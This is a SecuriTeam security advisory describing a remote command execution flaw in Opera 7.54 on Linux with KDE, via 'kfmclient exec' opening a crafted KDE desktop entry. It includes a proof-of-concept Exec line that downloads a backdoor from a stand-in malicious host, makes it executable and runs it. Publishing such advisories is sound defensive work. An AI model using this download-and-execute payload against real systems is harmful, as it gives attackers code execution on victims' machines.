SecuriTeam - Opera Remote Command Execution with Kfmclient

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam
Beyond Security

SecuriTeam Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

Opera is "a multi platform web browser. Opera includes pop-up blocking, tabbed browsing, integrated searches, E-mail, RSS Newsfeeds and IRC chat".

Opera for Linux uses "kfmclient exec" as "Default Application" to handle saved files. This could be used by malicious remote users to execute arbitrary shell commands on a target system.

Credit:
The information has been provided by Giovanni Delvecchio.
The original article can be found at: http://zone-h.org/en/advisories/read/id=6503/

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* Opera version 7.54 on Linux with Kde 3.2.3

Opening an unknown content type on the web using kfmclient exec could be used to open a "Kde Desktop Entry". A desktop entry can include shell commands in the 'Exec=' directive, and therefore run arbitrary code with the user's privileges.

Possible method of Exploitation:
This method of exploitation needs that a particular file name extension is used. If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , the command in "Exec=" entry will be executed. Instead, If "page.htm" is used as file name, it will not be opened like a "kde desktop entry" but it will be viewed in Konqueror. It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since the system is case sensitive.

Attack scenario:
A user clicks on a link which requires http://example.com/malicious/image.Jpg
The server responds with an unknown Content-Type field , for example Content-Type: image/Jpeg. (note the dot at the end), so Opera will show a dialog window.
If a user chooses "Open" to view image.Jpg, it will be opened by "kfmclient exec" command, since kfmclient is the "Default Application"

Image.Jpg is a kde desktop entry:

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

Note: \t is an horizontal tab. In this case a backdoor will be downloaded on victim's computer and executed.

Solution:
Disable "kfmclient exec" as default application

	PHP dba_replace() Arbitrary File Destruction
	VLC Media Player RealText Processing Stack Overflow Vulnerability
	LibSPF2 DNS TXT Record Parsing Bug
	GNU Enscript "setfilename" Special Escape Buffer Overflow
	File-Find-Object Format String Vulnerability
	Veritas Storage Foundation Arbitrary File Read Vulnerability
	Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability
	Apache Tomcat Information Disclosure (RemoteFilterValve)
	Apple CUPS HP-GL/2 filter Code Execution Vulnerability
	WordPress MU wpmu-Blogs.php Crose Site Scrpting Vulnerability
	strongSwan IKEv2 Denial of Service Vulnerability
	Cross-Site Scripting Filter Evasion in Various Frameworks / Applications
	MySQL Charset Truncation Vulnerability
	Wordpress user_login Column SQL Truncation Vulnerability
	Joomla Weak Random Password Reset Token Vulnerability